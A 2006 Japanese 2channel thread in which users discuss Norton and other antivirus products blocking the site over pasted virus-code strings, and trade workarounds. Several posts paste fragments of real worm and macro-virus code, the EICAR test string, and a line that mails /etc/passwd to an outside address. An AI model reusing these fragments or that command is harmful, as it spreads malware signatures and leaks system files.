2006/03/26(日) 19:58:57ID:/R1Hc6p70
ノートンにしなきゃいい
0735動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:08:42ID:/R1Hc6p70
フィギュアなんか誰も見ないし、しかも荒川出てないんだし・・・
0736動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/26(日) 20:11:55ID:/R1Hc6p70
・・・誤爆スマンカッタ
0738動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 00:57:22ID:3I+bmZi80
適当な文字を貼り付けるウイルス?あるじゃん
それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
分からない人の苦情が殺到して対応に追われるから。
>>167は危機感足りないんじゃ?
0739動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:02:58ID:AmYXUlqp0
単なる文字列であって実行ファイルではないのに検知する仕様をどうにかするのと
2ch側の対応、どっちが早いかな。
0740動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:21:18ID:NmoRfDPm0
コード貼り付けなんて何年前からあると思ってんの。
今更危機感足りないとか対応とか望んでも無駄でしょう。

無差別に爆撃ってことなら、コード貼り付け関係なくその爆撃自体は対応するでしょうけどね。
0741動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 01:21:46ID:e6NTu7TL0
>>738
今までの対応の仕方をみていて、単なる野次馬の予想ですが。

>適当な文字を貼り付けるウイルス?あるじゃん
これは対応すると思うが(現に今もやっている)

>それで無差別にコード貼りまくられたら流石に2ちゃんも対応するだろ。
>分からない人の苦情が殺到して対応に追われるから
こっちは対応いないんじゃないかな?

現に苦情が殺到中のコメントが>>167だった訳だし。
ノートンを切るか、2chに来ないかと言う答えになると思うよ。
0742動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 02:08:38ID:CRZkjnUj0
ウィルスじゃないものに反応するものとしないもの、選択権はユーザーにあるわけで
シェアをトレンドマイクロに奪われたりすればシマンテックも誤作動対策に着手するかもしれないが
ユーザーに対策を押し付けるような商売してたら淘汰されるのも仕方ないと思う
0744動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 07:09:30ID:GKKli8mx0
何でこのスレはいろいろはってあるのにスレが取得できるの?
0745sage
垢版 |
2006/03/27(月) 07:24:02ID:8a4Se6FG0

出会い系⇔ニューリンク
0747動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
シマンテックの日本支社はおそらく事態を把握してるだろうけど、
エンジンを書き換えるとなると本社の対応が必要なわけで、
「ある一つの掲示板が見られなくなる」ということの重要性が
あっちに伝わらないんだろうと思われ。

1000万人のネットユーザから不買運動されたらさすがに考えると
思うけど、そういう組織だった動きにもなっていないし。

もっとも、Antinny亜種の対応に追われている状況では
2ちゃんに対してあまり好意的にはなれないことも考えられるが。
0748外野ァァン
垢版 |
2006/03/27(月) 12:45:20ID:/XC2wMgb0
> もっとも、Antinny亜種の対応に追われている状況では
> 2ちゃんに対してあまり好意的にはなれないことも考えられるが。

ウィルスがあってこそのアンチウィルスソフトだから、
新種ウィルスの発現はむしろ喜ばしく思ってたりするんじゃないスかね
0749動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 12:49:35ID:rmERapPS0
この期に及んで2ちゃんでの誤作動に対応したら面白いな
仕様変更しない限り対応はしないんじゃねえかなぁ
それともユーザーが束になって苦情入れたら対応するのかな?
0750外野ァァン
垢版 |
2006/03/27(月) 12:50:05ID:/XC2wMgb0
スレ違いの部分にレスをつけてしまった予感
もしくは恋の予感
ごめん
0751動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 15:27:25ID:Jk15jv3kO
2ch対応
これだけで日本での売り上げが伸びるのにな
0754動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:34:49ID:6NuGU2zF0
対応する気なんか無いでしょ。
2002のころから、正規ユーザーとしてバージョンアップごとに
シマンテックにはご注進してきたのに、ラブレター文字列すら対応しないんだもの。

今回も、ワーム防止に自分ルール追加しろ、って返事だったよ。
(2chのサーバIPアドレスを信頼するように設定して回避しろと)
0755動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 16:58:55ID:vVYOuf/i0
さぁー回ってきましたっ!
この文を3〜10ヵ所に貼り付け、回してくださいw
これをやった貴方は絶対に夢や学校一のモテ仔に
なりますw
やんなかったら不幸が突撃します
もうココまで読んでしまった人は最低3ヵ所は回さないと絶対不幸が100%突撃して死亡するでしょう
この画像は最低3ヵ所回してから見てください
こちら
3〜10ヵ所って事は3箇所以上だったらなんでもいんですよっ!
やればやるほどし・あ・わ・せ!
これやった人は実際に
両思いになれたり、
学校一のモテ仔になれたり、
夢が叶ったり
欲しい物が手に入ったり。
一気に幸せが手に入ります
だから移せば移すほどお得!
成功した人の名前↓
山田三春
中野 純
その他にもたっくさん叶った人が居ます
だから回してね失敗した人なんて居ません
0756動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/27(月) 21:38:34ID:hQ0Nj+JU0
http://mickey.mirv.net/2chnis.html
にある対処方法(2chサーバのIPアドレスを除外する)はNISだけなんで、
NAV2005でそれらしい箇所探した。

「オプション」→「インターネットワーム防止」→「一般ルール」→「Default Non-Routable IPs」を「修正」→「処理」タブで「許可」→「コンピュータ」タブの「下のリストにあるコンピュータとサイトのみ」で「追加」→「個別」

のとこにコピペでいいと思う。右クリックで貼り付けがきかなかったので、Ctrl+Vでやった。
0761動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/30(木) 19:46:50ID:+bc29xxf0
さっき先生が誤作動起した。
2ちゃんから攻撃されたので遮断しますたって
なんとか解除したけど
0762動け動けウゴウゴ2ちゃんねる
垢版 |
2006/03/31(金) 22:00:47ID:97YYo5Zc0
ノートンのソフト自体の終了方法ってないの?
タスクマネージャ見てもどれがどれだかさっぱり・・・。
0770動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/02(日) 18:17:31ID:LqxABCFV0
今日ノートンが反応してここに誘導してもらって最初から読んでたけど、
NIS入れてないし侵入検知って項目も無いのに…て思ってたらNAVでも反応するのか。
ここまで読むの大変だったけどためになったわ有り難う
0771動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/05(水) 06:28:02ID:L6X4AuEx0
当方マカフィーなのだが、下記のスレを取得しようとすると大激怒されて、
該当datが抹殺されたあげくネットアクセスが遮断されてしまう… orz

【領事館員自殺】中国側、機密を執拗に要求…総領事あての遺書入手(読売新聞)★2
ttp://news19.2ch.net/test/read.cgi/newsplus/1143894478/l50


…時々こういう事が起こるのだが、その都度運営板の
どこぞかの該当スレに通報した方がイイのかしらん?
0774動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>771-772
マカフィーを窓から投げ捨てろ。
さもなきゃ自分の頭を窓から投げ捨てろ。
0777動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/06(木) 15:48:38ID:ogl3bSVi0
NAVの場合の設定を教えてくれー

インターネットワーム防止で
ナニをシグネチャ除外すれば良いんだ?
0780動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/07(金) 10:26:14ID:9BaGKlIFO
ms-its:mhtml:file://C:\


c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")


<body onload=window()>


c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))   
ms-its:mhtml:file://c:\ 
kak.hta';ken=wd+'START
End Sub


G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WC
0785動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/08(土) 14:52:00ID:0n8hZvPv0
2005でも誤作動するようになったな
専ブラのあぼーんよりも先にノートンがdatに反応するようになったのが原因ぽい
0788動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/09(日) 08:35:16ID:qBdtQITt0
このスレ、更新しようとすると、NISにブロックされて、専ブラのタブが赤くなる。(JaneDoeStyle223)
あぼーんワードはどれですか?

今はNISを無効にしてカキコしています。
0792788
垢版 |
2006/04/10(月) 23:20:01ID:2y1G/tIP0
>>510
>>512
>>517

これらはすべてアボーソしてあります。
NISの設定も変えていませんでした。

>>780-785あたりでJaneDoeStyle223がおかしくなりました。
他スレでは何ともありません。

で、あれからは、ログを取得し直しただけですが、無問題になりました。
いったい何だったんだろう。
ログが壊れただけだったのかな…。

0793動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/12(水) 15:42:54ID:ch5Pl/k40
なんかバスターが2ちゃんのスレをIEで見るとそれだけでウイルス検知するようになったらしいね・・・
先生よりアグレッシブだな
0800動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/15(土) 15:03:59ID:KVooKePH0
ダウン版見れないのはNISのせい?
0805ノtasukeruyo
垢版 |
2006/04/18(火) 02:04:50ID:DZuh5+A/0
この板限定の機能
tasukeruyoするとuserAgent情報が表示される
でもスレ違い
Monazilla/1.00 (JaneStyle/2.23)
0806動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/18(火) 23:18:38ID:lCVacxaa0
すいません、私はノートンではなくシマンテックアンチウイルスを使ってるのですが、この場合はどのように対処すればいいんでしょうか
既出の問題でしたらすいません
0808動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/19(水) 01:07:29ID:xlDAqNv20
>>807
ありがとうございます
私はノートンアンチウイルスではなくてシマンテックアンチウイルスを使ってるのですが、同じようにできるのですか?
オプションが見つからないのですが・・・
0810動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/19(水) 01:22:14ID:c9kwy/nh0
シマンテックアンチウイルスってはじめて聞いたや
ぐぐったところ企業用?
よくわからんが個人のPCにどこまで権限あるのかねぇ
0811動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/20(木) 14:40:19ID:cpaj9cKu0
>>810
説明不足ですいません、企業用のものです
一応無償でもらったノートPCなのですが・・・
ノートンに変えていいか聞いてみます
0817動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/29(土) 08:20:30ID:4i3tyZmJ0
また、マカフィーが大激怒…

任天堂新ハード正式名称発表その名も「wii(ウィー)」
ttp://live22x.2ch.net/test/read.cgi/news/1146155170/


…「ノートン先生」みたいに、スキャン対象から簡単に外せないんだから、ウィルスコード貼るな!


お願いしますよ orz
0818動け動けウゴウゴ2ちゃんねる
垢版 |
2006/04/29(土) 09:51:08ID:v+w1epi4P
>>817
>>167
0822187.72.30.125.dy.iij4u.or.jp(125.30.72.187)
垢版 |
2006/05/06(土) 02:41:29ID:y9hztnnP0
ためさせて・・
Monazilla/1.00 (V2C/T20060424)
0825動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/06(土) 13:29:11ID:IDtWUQIu0
>>824
オプション→インターネットワーム防止→AutoBlockで遮断しているIPがあれば除外
→防止を有効にするのチェック外してログ取得
これでもダメ?
0828動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/13(土) 03:20:08ID:WH+6QveU0
また、コード貼った馬鹿が… orz

【国際】「麻薬の運び屋に仕立てられた」 無罪訴え続けた日本人男性、逮捕から14年で仮釈放…オーストラリア
ttp://news19.2ch.net/test/read.cgi/newsplus/1147357192/

シクシクシク
0830動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/13(土) 10:31:19ID:ZNCsmQsr0
昨日あたりから板を開くとノートンが反応するんだけど、
同じ境遇の人っている?
0832動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/13(土) 13:57:27ID:4Mz3XLyv0
ノートンを誤作動させる文字列は何年も前からあるし、シマンテックに連絡しても
これで正常と言って対策しない。
つまりシマンテックは自力で対策できる人だけ買ってくれればいいと言っている。
そんなソフトは>>167
0833得ROM街の悪無 ◆wv57DoER0M
垢版 |
2006/05/13(土) 18:17:51ID:MOWCA5430
AntiVirus の設定→除外→C:\Program Files\Jane\Logs
2chブラウザ使ってるならこれでいいでそ
0835動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/15(月) 18:54:17ID:PrBQtiGL0
Janeを開いたり更新をするたびに
C:\ProgramFiles\Jane Style\Logs\2ch\AA\AAサロン\subject.txt
この警告が出ます。
除外もしたり、このtxtを削除したりもするのですが効果が出ませんでした。
対処法をお願いします。
0839動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/15(月) 19:23:32ID:ykTsWDCL0
3日前から、ラウンジクラシックに入ろうとするとノートンアンチウイルス2005が反応して、
sports2鯖ごとノートンにアク禁されます。
一度踏むと30分間アク禁で、ノートン無効にしてもダメなので困ってます。

↓ログ

詳細: このコンピュータに対する侵入 「HTTP MSIE JavaScript OnLoad Rte CodeExec」 の試みを検出して遮断しました。
侵入者: sports2.2ch.net(210.(伏せ;侵入者のIPアドレス))(http(80)).
危険度: 高
プロトコル: TCP
攻撃された IP: DEFAULT(192.(伏せ;自分のPCのIPアドレス).1).
攻撃された ポート: xxxx
             ↑ランダム

これもウイルスコードの仕業ですか。
0843動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/20(土) 02:01:04ID:UxN9/Hbe0
N速+でまた、幾つかのスレにウィルスコード張られてるなぁ…



貼る馬鹿は、樹海池
0845動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/20(土) 02:08:04ID:4fzoyPrc0
貼る馬鹿っつーのは、他人の家に勝手に出前送りつけたり
ピンポンダッシュして物陰からニヤニヤしながら眺めてるような奴なのかな?
マジで樹海逝ってくれ
0849動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/21(日) 17:58:26ID:+w8Xwl0G0
ヽ(`Д´)ノウワァァン!!
0851動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 00:10:53ID:8SW5pKAP0
野豚先生のオートブロックからオカ板を救い出そうとしたんだけど、制限押しちゃった。
どうしたら制限解除できるか教えてえらい人。
0852動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 05:24:43ID:wNSTIVWx0
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
0854動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 18:34:49ID:x/ho1oyO0
今日ノートンをつけたけど、ホントにウィルスが反応したwww
びっくりww
0857動け動けウゴウゴ2ちゃんねる
垢版 |
2006/05/22(月) 23:06:13ID:ETkw1oK20
おおう・・・アンチウイルスがMSIEJAVAオンロードに反応して
このスレの対策覗けなかったぜ
ワーム防止解除でやっと見れた

少し賢くなれた気がする。自分にとって不具合がある方がなあに、かえって免疫力がつく。
そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。
0858名無しさんの助言 ◆JogenOuJ66
垢版 |
2006/05/23(火) 08:29:28ID:n+xiKrcl0
>そして流石はノートン先生、生まれた子供を崖から消毒するだけのことはある。

ここんとこクソワロタ。

専用ブラウザ使ってる人は、852の書き込みをそのままNGワードのリストに貼っちゃうというのも
楽かも知れないですね、とか言ってみるテスト。
0860動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/01(木) 08:12:48ID:3zZVmq9d0
今日反応したスレ

【日テレ隠蔽疑惑】炭谷宗佑アナを報じない日テレ、容疑否認のテレ東社員を実名報道 テレ東も即日実名で伝える★2
http://news19.2ch.net/test/read.cgi/newsplus/1148999462/

…この騒動が起きてから、幾つかの『日テレ隠蔽疑惑』関連スレに、
ウィルスコード貼ってる香具師が居るなぁ




まさか、関係者?>コード貼る馬鹿
0862softbank220001088253.bbtec.net(220.1.88.253)
垢版 |
2006/06/01(木) 22:47:23ID:/syViJED0
どう?
Monazilla/1.00 (cockcrow/2.5.5.5)
0863動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/01(木) 23:12:19ID:2pQl8VUp0
誤作動ばかり起こるセキュリソフトを使い続ける人の気が知れねwwww
0864動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/02(金) 18:24:12ID:1Oq2QSVQ0
やっとここにたどり着いた。
昨日206.223.152.55に攻撃されたのはノートンのせいってこと?
何度も攻撃されてびびったよ誰か教えて。
0866動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/02(金) 19:43:52ID:ep2eE5W+0
>昨日206.223.152.55に攻撃された

なんで2ちゃんのサーバーがお前を攻撃するんだ?

206.223.152.55 = tiger508.maido3.com = life7.2ch.net

自己紹介 夢・独り言 生活サロン 生活全般 その日暮らし 一人暮らし 借金生活
スポーツクラブ 記念日 冠婚葬祭 育児 家具 モデル ファッション 靴 化粧 美容 美容整形
一般海外生活 北米海外生活 クレジット 家庭 懸賞 たばこ めがね マイライン コンビニ バーゲン  
ヒッキー メンヘルサロン 癒し 人生相談 心と宗教 身体・健康 アトピー アレルギー ハゲ・ズラ メンタルヘルス
0868動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/03(土) 22:12:48ID:zqZmttpa0
ノートンアンチウイルス2005の場合、設定はどうやったらいいのでしょうか?
エロイ人教えて
0869868
垢版 |
2006/06/03(土) 22:22:47ID:zqZmttpa0
自己解決しました。すみません。
0872動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/03(土) 23:06:24ID:uTPZaxbS0
test
0874870
垢版 |
2006/06/03(土) 23:38:39ID:LY3W2bvD0
書き込まず読み込むだけで
インターネットワーム防止→AutoBlockルール
にその板の2ちゃんアドレスが書き込まれます

もちろん「侵入を検知して遮断しました」と言われるわけですが


「HTTP MSIE JavaScript OnLoad Rte CodeExec」のチェックを外せば
読み込めますが、うざすぎ
0876動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/04(日) 09:39:07ID:SyplLNft0
ノートン捨てた。ソースネクストにした。良かった。
0880動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/04(日) 22:55:29ID:zBN5dg8i0
つーか、誤動作というより2ch管理人が
HTTP MSIE JavaScript OnLoad Rte CodeExec送信してアクセス妨害しているだけだし

ノートン入れられると2chにとって都合の悪い利用者のハッキングができないから
どーしてもノートンを外させたいらしいね
0882動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/05(月) 11:14:26ID:9IAVDNee0
>>835
表示されたファイルをAuto−Protectの除外リストに加える。
シマンテック
ttp://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7
0884882
垢版 |
2006/06/05(月) 12:47:48ID:9IAVDNee0
>>883
貴重なご意見ありがとうございます。
今後の参考にさせていただきます。
0888動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/10(土) 14:13:07ID:B1kyHaxf0
//<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

これってNIS2003でどう対処すればいいですかね
ttp://mickey.mirv.net/2chnis.html とかもやってみたけど効果なかった。
0889動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/10(土) 14:37:07ID:vbM5yPaN0
2ちゃんねるWiki
http://info.2ch.net/wiki/pukiwiki.php?%A3%B2%A4%C1%A4%E3%A4%F3%A4%CD%A4%EBWiki
ノートン入れたら2chに書きこめない人へ
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
ノートン応急対策
http://info.2ch.net/wiki/pukiwiki.php?%CA%E4%C2%AD%A4%C8%CA%E4%B4%B0#Norton_Emergency_measures
0891動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 03:59:21ID:NXtyf/QL0
むしろウイルスコード貼ったヤツは強制フシアナになるようにすればいいんだよ。
どこの誰がやっているか一発でわかるしww
0893動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 05:18:57ID:YJ3RbPRP0
>>890-891
↓ウイルスコードを貼って、マッチ&ポンプでノートンなどを叩いている犯人の一人の紹介スレ。


(アンチウイルスNOD32厨とインテル厨とペストパトロール厨を兼ねている)
http://tmp6.2ch.net/test/read.cgi/tubo/1145644897/
http://66.102.7.104/search?q=cache:yFC7aJM6xCgJ:l-lab.org/pukiwiki/pukiwiki.php
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html
http://pc8.2ch.net/test/read.cgi/pcnews/1132667241/
http://science3.2ch.net/test/read.cgi/infosys/1088029040/
過去に確認されたリモホ
osaknt01.ap.so-net.ne.jp
osaka-ip.dti.ne.jp
acca.osaka.ocn.ne.jp
ppp.prin.ne.jp(PHS)
0895動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 10:41:08ID:bxlw8H2ZO
いまさらウイルスコードでギャーギャー騒ぐ奴ってなんなの?


馬鹿なの?
0898動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/11(日) 13:11:01ID:OGt9xJAc0
今日ちょうどギャーギャー騒いでる奴見かけたところだw

642 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 03:26:36 ID:aqYcE6Jh
だれだ最近、避難所にウイルスコード貼る奴。
専ブラがおかしくなって、そのたびに削除→ダウンロードしなおし→お気に入り登録しなおし、すごい手間、めちゃくちゃ迷惑。

643 名前:名無しさん@ゴーゴーゴーゴー! [sage] 投稿日:2006/06/11(日) 07:23:59 ID:QvemZE+C
>>642
それって難民フォルダーにあるsubject.txt(専ブラによって名称違うかも)を上書きするだけで直るよ
0901動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/17(土) 01:58:39ID:KdVQpFu60
Norton使わなきゃいいだけの話なのに
何でこんなに盛り上がってんの?

Symantecがクソなだけだろ。
2chがそこまで面倒見る必要ないよ。
0902動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/17(土) 02:10:57ID:c15+vmjg0
             _,..--‐‐‐‐‐-...,_    
           /:::::::::::::::::::::::::::::::::::'.,    
          /:::::::::::::::::::::::::::::::::::::::::::::::..    
          i,  NOD32厨   ::::::::::::, 
          ゝ  /'  '\    :::::::::::'
           . -・=-, 、-・=-  ::::::::::;'     
           |  .,ノ(・ ・ ( ⌒  ::6)      
           .l ┃トョヨコイ┃  .ソ  < Norton使わなきゃいいだけの話なのに   
           ヽ┃`ニ'´ ┃ ,.i-、  
             ,`~,'i' "~ /  ,>"'-、  
0907動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
まぁ、私の場合は

NAVが反応→NAVのオプションから
インターネットワーム防止>AutoBlockルール>全ての遮断を解除
して、インターネットワーム防止を解除(警告が出るので、OKを押しておく)
→2chブラウザのログを取得して、ウィルスコードの部分をローカルあぼーん

で、難なくNAVを使っているわけだが。
0910動け動けウゴウゴ2ちゃんねる
垢版 |
NGNG
>>909
NAVが反応→2ch鯖が遮断
              ↓
NAVを起動して、オプションにアクセス。インターネットワーム防止をクリック
              ↓
AutoBlockルールをクリックして、全ての遮断を解除をクリック
              ↓
インターネットワーム防止をオンにするのチェックを外す>OKを押す
              ↓
保護の警告ダイヤログが出る。
停止時間を15分、1時間、5時間、システム再起動まで、永久的から選択可能。
OKを押すとインターネットワーム防止機能が停止。
              ↓
ログを取得して、ウィルスコードが書かれたレスを
2chブラウザのローカルあぼーん機能で削除する。
#ブラウザ上あぼーんでも、取得したdatには残るソフトでは駄目かも。
              ↓
インターネットワーム防止機能を復帰させる。
0912動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 01:59:16ID:KtKK/xzI0
わからない五大理由改

<ノートントラップにかかる六大理由>
1. 読まない ・・・対処法は書いてあるのに読まない。読む気などさらさらない。
2. 調べない ・・・過去スレ、ググるなど最低限の内容も自分で調べようとしない。
3. 試さない ・・・めんどくさいなどの理由で実行しない。する気もない。
4. 理解力が足りない ・・・理解力以前の問題で理解しようとしない。
5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。
6. それでもノートンを使う ・・・上記に該当するのに、誤作動を仕様と言って直さない糞ソフトに大事なお金を垂れ流す。
0914動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 11:43:16ID:6mehq8cj0
>912
>5. 人を利用することしか頭にない ・・・甘え根性でその場を乗り切ろうとする。

それを世間一般では、『 要領がいい 』又は『 狡い 』という。
912は、要領の悪い世間知らずのヒッキーか?

0915動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/18(日) 13:19:15ID:XZEJdYVF0
現在回避できないノートントラップなどあるでしょうか?
特にノートンじゃなくても良いのですが、他の不具合が出るとか、
ありますでしょうか。

私は早々にノートンから他のセキュリティー製品に切り替えてしまったので、その辺りが解らないので質問させていただきました。。
0916動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/19(月) 10:42:39ID:V5zd1Xkf0
アバストも駄目
0918動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/19(月) 23:36:55ID:1dSp2Mu/0
>>912
ノートンを誤作動とか言ってる時点でわかってないじゃない
0919動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/21(水) 23:07:21ID:N0YkyuI90
NIS2006なんだけど対策教えて下さい
0921動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/22(木) 08:01:45ID:z+Bj6crv0
>>920
一応レス後半やまとめサイトの2005のをやった後に一時的によくなったんですが
ダメな板はダメで、その後>>13とかやったんですけどはじかれちゃうんですよ。
他にありませんかね。
30分待てば又スレ読めますので教えてください
0928動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/23(金) 19:48:23ID:AL1OlihM0
>>917 さん
返信ありがとうございます、参考にさせていただきます。

>>916 さん
情報ありがとうございます
アバストについては自分で調べてみます。
0929915-928
垢版 |
2006/06/24(土) 08:42:08ID:2lOlEW2f0
928の後、調べたところ、
アバストも設定で回避できるということがわかりました、
ノートンも確認済み。

(微妙にすれ違い失礼しました。)
0930動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 19:10:33ID:nPZXTUgCO
コードの野郎どこにありやがる
0936動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 20:40:15ID:qn/6XT870
NIS2005の場合(多分NIS2006も同じ)
タスクトレイのNISアイコンを左クリック>「Norton Internet Securityを開く」
NISが開いたら、左側の一覧から「Norton Internet Security」を選ぶ
システムの状態一覧から「ファイアーウォール」を選ぶ
左下にある「設定」ボタンを選ぶ
「ネットワーク」タブを選ぶ
「信頼」タブを選ぶ
「追加」を選ぶ
「個別」を選ぶ
アドレスに以下の数字の塊を一行でコピペする   ← ここで、コピペができません。どうしたらいいですか?



0938動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/25(日) 20:45:26ID:qn/6XT870
>>937
できました。 ありがとうございました。
0939動け動けウゴウゴ2ちゃんねる
垢版 |
2006/06/26(月) 23:19:03ID:04A0pu1O0
とあるスレ一覧更新したら「WScript.KakWorm」の警告がでます
